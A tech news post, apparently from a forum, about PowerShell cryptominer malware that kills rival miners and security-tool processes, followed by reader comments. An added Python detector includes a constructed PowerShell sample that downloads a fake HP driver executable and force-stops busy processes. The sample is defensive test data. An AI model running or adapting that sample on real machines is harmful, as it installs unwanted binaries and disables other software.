Cryptocurrency-mining malware-scum have started to write code that evicts rivals from compromised computers.
The miner in question was first noticed by SANS Internet Storm Center handler Xavier Mertens. Mertens spotted the PowerShell script on March 4, and noting that it kills any other CPU-greedy processes it spots on target machines, he wrote: “The fight for CPU cycles started!”
Pre-infection, the attack script checks whether a target machine is 32-bit or 64-bit and downloads files known to VirusTotal as hpdriver.exe or hpw64 (they're pretending to be HP drivers of some kind).
If successfully installed, the attack then lists running processes and kills any it doesn't like. Mertens noted that alongside ordinary Windows stuff, the list of death-marked processes includes many associated with cryptominers, some of which are listed below.
Mertens wrote that the script also checks for processes associated with security tools.
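As an added example (not part of the article or of Mertens's diary), here is a defender-side heuristic in Python that scans PowerShell script text, such as blocks recovered from script block logging, for the combination of behaviours described above: an architecture check, an executable download, process enumeration and process killing. The regex patterns, function names and the two sample scripts are constructed for illustration and are assumptions, not taken from the real sample.

```python
import re

# Indicators for the behaviours the article describes. Patterns are assumptions
# chosen for illustration; tune them against your own script block logs.
INDICATORS = {
    "arch_check": re.compile(r"Is64BitOperatingSystem|PROCESSOR_ARCHITECTURE|\[IntPtr\]::Size", re.I),
    "exe_download": re.compile(r"\b(DownloadFile|Invoke-WebRequest|iwr|wget|curl)\b[^\n]*\.exe", re.I),
    "proc_enum": re.compile(r"Get-Process|tasklist", re.I),
    "proc_kill": re.compile(r"Stop-Process|taskkill|\.Kill\(\)", re.I),
    "hp_driver_lure": re.compile(r"hpdriver\.exe|hpw64", re.I),  # file names named in the article
}


def score_script(script: str) -> dict:
    """Return which indicators fire and whether the combination looks like a miner dropper."""
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    # Enumerating and killing processes on its own is common admin work; it becomes
    # suspicious when paired with an architecture-dependent executable download.
    hits["suspicious"] = hits["proc_enum"] and hits["proc_kill"] and (
        hits["exe_download"] or hits["arch_check"]
    )
    return hits


def flag_blocks(blocks: list) -> list:
    """Indices of script blocks (e.g. from PowerShell event logging) that score as suspicious."""
    return [i for i, block in enumerate(blocks) if score_script(block)["suspicious"]]


# Constructed samples: a harmless admin one-liner and a script mimicking the described behaviour.
BENIGN_SAMPLE = "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"
SUSPICIOUS_SAMPLE = r"""
if ([Environment]::Is64BitOperatingSystem) { $u = 'http://example.invalid/hpw64' } else { $u = 'http://example.invalid/hpdriver.exe' }
(New-Object Net.WebClient).DownloadFile($u, "$env:TEMP\hpdriver.exe")
Get-Process | Where-Object { $_.CPU -gt 100 } | Stop-Process -Force
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(name, score_script(sample))
    print("flagged blocks:", flag_blocks([BENIGN_SAMPLE, SUSPICIOUS_SAMPLE]))
```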
(Score: 3, Informative) by Anonymous Coward on Wednesday March 07 2018, @08:02PM (2 children)
Microsoft calls that "gathering telemetry data".
(Score: 2) by frojack on Wednesday March 07 2018, @08:35PM (1 child)
I wonder how Microsoft has avoided being bombed by embedded malware in all the data they exfiltrate during their telemetry data grab.
I mean all you have to do is watch any modern spy TV show to know that there's an edgy girl hacker (it's always a girl) who could send them something that would infect their entire operation and let them look at the cameras in the elevators and stuff. All by putting a little code inside a text file somewhere in a Windows machine and waiting for Microsoft to snatch it up.
No, you are mistaken. I've always had this sig.
(Score: 2) by maxwell demon on Thursday March 08 2018, @06:06AM
I guess simply by not trying to execute it.
The Tao of math: The numbers you can count are not the real numbers.